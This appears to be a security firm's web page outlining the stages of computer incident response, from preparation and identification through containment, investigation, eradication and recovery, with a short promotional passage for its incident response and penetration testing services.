It is essential that every organization is prepared for the worst. So how will you handle the situation? Preparation is key and it involves identifying the start of an incident, how to recover, how to get everything back to normal, and creating established security policies. Other aspects that should be considered when prepping are training and pre-deployed incident handling assets. When training for an incident you should contemplate different types of training your team needs such as OS support, specialized investigative techniques, usage, and corporate environmental procedure requirements.
When looking at your pre-deployed incident handling assets, you want to make sure you have certain tools in place in case of a system breach. This includes monitoring your own sensors, probes, and monitors on critical systems, tracking databases in core systems and completing active audit logs for all server network aspects and components.
The next stage of incident response is identifying the actual incident. The first question you want your team to answer is; is the event an unusual activity or more? Once that answer has been established you are going to want to check out some areas of the affected system. This includes suspicious entries in system or network accounting, excessive login attempts, unexplained new user accounts, unexpected new files, etc. After you have assessed the situation there are six levels of classification when it comes to incidents.
These essential areas of coverage are;
- Protecting and keeping available critical computing resources where possible
- Determining the operational status of the infected computer, system or network.
In order to determine the operational status of your infected system and or network, you have three options:
- Disconnect system from the network and allow it to continue stand-alone operations
- Shut down everything immediately
- Continue to allow the system to run on the network and monitor the activities
All of these options are viable solutions to contain the issue at the beginning of the incident response and should be determined a.s.a.p. to allow movement to the next stage.
- We offer best-in-class Incident Responses services to your company IT Infra. We perform advance assessment of your application security – both manual and automated for future.
- Often the business model is overlooked, but we take care of the business logic testing by understanding the business process running on the system and then by adding business logic test cases accordingly. We have a fairly strong understanding of typical business process such as online trading, e-commerce, supply chain, retail banking, treasury, payroll, procurement, etc. This helps us build in-depth business logic cases even in a routine penetration testing exercise and add far more value than a plain-vanilla penetration testing exercise to secure from cyber attacks.
- Testers explore the infrastructure using smartly crafted payload, study offensive hacking techniques in order to develop defensive mechanism.
This is the first step in determining what actually happened to your system, computer or network. A systematic review needs to take place on all the bit-stream copies of the drives, external storage, real-time memory, network devices logs, system logs, application logs, and other supporting data. It is very important to keep well-written documentation of everything you do during the investigation, especially since external threats may require law enforcement involvement.
Eradication is the process of actually getting rid of the issue on your computer, system or network. This step should only take place after all external and internal actions are completed. There are two important aspects of eradication which you should keep in mind. The first is cleanup. Cleanup usually consists of running your antivirus software, uninstalling the infected software, rebuilding the OS or replacing the entire hard drive and reconstructing the network.
This is when your company or organization returns to normal. There are two steps to recovery.
- Service restoration, which is based on implementing corporate contingency plans
- System and/or network validation, testing, and certifying the system as operational
- Any component that was compromised must become re-certified as both operational and secure